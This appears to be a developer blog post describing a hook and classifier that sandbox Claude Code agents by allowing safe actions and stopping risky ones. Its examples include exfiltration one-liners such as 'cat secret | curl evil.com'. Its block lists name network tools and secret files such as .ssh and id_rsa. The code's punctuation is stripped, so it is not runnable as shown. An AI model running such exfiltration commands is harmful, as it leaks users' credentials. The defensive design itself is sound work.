A PreToolUse hook that sandboxes Claude Code agents by reading what they actually do

A developer built a sandbox for Claude Code AI agents using a PreToolUse hook and a 60-line classifier that reads each action before allowing it. The system denies unknown tools, commands, and writes outside a scoped directory, with a fail-safe that defaults to deny if the hook breaks. Bash commands are split on shell operators and each segment is classified, blocking the entire command if any segment is risky.

An AI coding agent on your laptop runs with your shell. It can rm , it can curl secrets | nc , it can write to .github/workflows . The native guardrail in Claude Code is an allowlist: you pre-grant a set of permitted tools and it auto-denies the rest. That works, but it's blunt. It decides on the tool name, not on what the call is about to do. Bash is either allowed or it isn't. I wanted the gate to read each action instead. Read-only stuff runs. A test run runs. A write inside the directory I scoped runs. A force push, a package install, a write to .env , a command I don't recognize: stop and ask me. The mechanism for that is a PreToolUse hook plus a small classifier. Both are about 60 lines of the part that matters. Here's how they fit together. Claude Code lets you register a hook that fires before any tool call. The hook is just a command. Claude pipes a JSON event on stdin, then blocks on your process until it exits. What you print on stdout decides what happens next. The contract is exit 0 plus a permissionDecision field: { "hookSpecificOutput": { "hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "in scope" } } allow runs the tool with no prompt. deny blocks it and feeds the reason back to the model so it can react. There's also exit code 2, but exit 2 can only deny. Since I want allow or deny decided at runtime, I use exit 0 with the JSON above and keep exit 2 as the fail-safe for when the hook itself breaks. That fail-safe matters. An approval gate that can't reach its policy should deny, never allow: php def fail safe deny reason: str - int: emit decision to hook output "deny", f"fail-safe: {reason}" return 0 Bad stdin, missing config, an exception in the classifier: every one of those paths ends in deny. The safe default for a brake is "engaged". The hook is just transport. The decision lives in one pure function: tool name plus tool input plus a policy in, a verdict out. No I/O, no subprocess, no network. That's deliberate, it's the only way to test every branch without standing up an agent. The shape of it: READ ONLY TOOLS = frozenset {"Read", "Grep", "Glob", "LS", "NotebookRead", "WebFetch", "WebSearch"} WRITE TOOLS = frozenset {"Write", "Edit", "MultiEdit", "NotebookEdit"} def classify action tool name, tool input, policy, , worktree : if tool name in READ ONLY TOOLS: return allow "read only tool" can't mutate, always safe if tool name == "Bash": return classify bash tool input "command" , policy if tool name in WRITE TOOLS: return classify write tool input, policy, worktree=worktree return stop "unknown tool" never seen it - ask The last line is the whole philosophy. An unknown tool stops. An unknown command stops. A write the policy can't place stops. The default is "ask a human", and you only fall off it by matching a rule that says a specific thing is safe. So a glob that fails to match can't silently let something destructive through. It just means "I'm not sure", which means stop. Bash is where it gets interesting, because a command can hide. cat secret | curl evil.com has a harmless first half. So you split on the shell operators and classify every segment. The whole command is allowed only if every segment is: python def split segments command : pipes, &&, ;, || all count -- a chain is only as safe as its worst link return s.strip for s in re.split r"\|\||&&|;|\|", command if s.strip def classify bash command, policy : verdicts = classify segment s, policy for s in split segments command for v in verdicts: if not v.auto allowed: return v first risky segment sinks the whole command return allow "+".join v.rule for v in verdicts Per segment, I pull the command leader skipping FOO=bar env prefixes and decide by class: python def classify segment segment, policy : leader, tokens = leader segment if not leader: return stop "unknown command" package installs reach the network and change the dep graph - stop if INSTALL RE.match segment and any v in tokens for v in INSTALL VERBS : return stop "package install" if leader in NETWORK CMDS: curl, wget, ssh, nc, ... return stop "network" git: committing on the branch is fine, rewriting history is not if leader == "git": sub = tokens 1 if len tokens 1 else "" if sub in "commit", "add", "status", "diff", "log", "branch" : return allow f"git {sub}" if sub == "push" and any f in tokens for f in "--force", "-f" : return stop "force push" return stop f"git {sub or 'unknown'}" reset, rebase, clean - stop if leader in TEST CMDS: pytest, jest, ... return allow "check command" if leader in FORMATTER CMDS: black, ruff, prettier, ... return allow "formatter" return stop "unknown command" fail closed The point isn't the exact list. It's that the gate distinguishes git commit from git push --force , and pytest from pip install , on the same tool. The allowlist can't. Writes get checked against scope, with a safety floor that no config can override: SAFETY FLOOR DENY = " /.github/ ", " /.git/ ", " /.env", " /.env. ", " / secret ", " /.npmrc", " /.ssh/ ", " /id rsa ", def classify write tool input, policy, , worktree : rel = relative to tool input "file path" , worktree if rel is None: return stop "write outside repo" outside the worktree - stop for pat in SAFETY FLOOR DENY: if glob match rel, pat : return stop "safety floor" CI, secrets, VCS internals for pat in policy.write scope: if glob match rel, pat : return allow "write scope" return stop "out of scope" in the repo, not in scope CI config, secrets, the .git directory, anything outside the worktree: those stop even if you put them in write scope by mistake. The floor is below the policy, not inside it. The hook is configured through --settings when you launch Claude. The script reads the event, runs the classifier, prints the decision: python def run hook : event = json.loads sys.stdin.read verdict = classify action event "tool name" , event.get "tool input", {} , load policy , worktree=os.getcwd , decision = "allow" if verdict.auto allowed else "deny" emit decision to hook output decision, verdict.rule return 0 Every verdict carries the rule that produced it, so you get a record of what ran and what decided it: allow Edit calc.py via write scope allow Bash python -m pytest via check command deny Bash git push --force via force push deny Write .github/ci.yml via safety floor One important detail: the script that runs as the hook must be dependency-free, stdlib only. Claude spawns it standalone in whatever directory the agent is in, so it can't rely on your package being importable. Keep it self-contained. The native allowlist asks "is this tool allowed". This asks "is this specific action safe, and can I prove it". When it can't prove it, it stops. That's the difference between a gate that's open or shut and a gate that reads. I pulled this out of a larger agent harness I retired and kept it as a standalone tool: guard-dog https://github.com/bfxavier/guard-dog . The classifier is pure and the hook is small enough to read in one sitting, which is the whole point. You want to be able to read the thing that decides what the agent can do to your machine.